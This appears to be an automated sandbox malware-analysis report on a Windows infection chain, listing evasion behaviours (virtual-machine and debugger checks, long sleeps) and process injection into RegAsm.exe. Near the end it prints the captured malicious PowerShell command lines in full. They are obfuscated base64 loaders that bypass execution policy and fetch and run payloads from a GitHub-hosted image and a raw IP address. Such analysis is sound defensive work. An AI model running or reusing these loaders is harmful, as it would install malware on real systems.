                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F7E2 Sleep,ExitProcess,11_2_0040F7E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_0041A7D9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5235Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4480Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7828Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1845Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1023Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4165Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5584Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 601
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8815
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1771
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_11-53538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.6 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep count: 7828 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1096Thread sleep count: 1845 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6848Thread sleep count: 1023 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep count: 151 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5536Thread sleep count: 115 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep count: 4165 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4196Thread sleep count: 5584 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3836Thread sleep count: 234 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3836Thread sleep time: -117000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5968Thread sleep count: 601 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5968Thread sleep time: -1803000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5968Thread sleep count: 8815 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5968Thread sleep time: -26445000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10006580 FindFirstFileExA,11_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: wscript.exe, 00000006.00000003.2210221168.00000000033AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\afy$
                      Source: powershell.exe, 00000001.00000002.2246017542.0000000007231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
                      Source: powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000003.2210221168.00000000033AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: RegAsm.exe, 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                      Source: powershell.exe, 00000001.00000002.2246017542.00000000072C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP',
                      Source: RegAsm.exe, 0000000B.00000002.4544784858.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
                      Source: powershell.exe, 00000001.00000002.2248708660.0000000008174000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z
                      Source: mshta.exe, 00000000.00000003.2106501127.0000000005435000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: powershell.exe, 00000001.00000002.2248708660.0000000008174000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2246017542.00000000072C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4544784858.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000001.00000002.2248708660.0000000008174000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: powershell.exe, 00000001.00000002.2248708660.0000000008174000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000002.2215846794.000000000582E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Z
                      Source: powershell.exe, 00000009.00000002.2350550754.0000000002F21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_11-55088
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00443355 mov eax, dword ptr fs:[00000030h]11_2_00443355
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10004AB4 mov eax, dword ptr fs:[00000030h]11_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,11_2_00411D39
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043503C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043BB71
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434BD8 SetUnhandledExceptionFilter,11_2_00434BD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi32_4408.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi32_1476.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi32_1476.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,11_2_0041812A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 61B008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00412132
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419662 mouse_event,11_2_00419662
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUy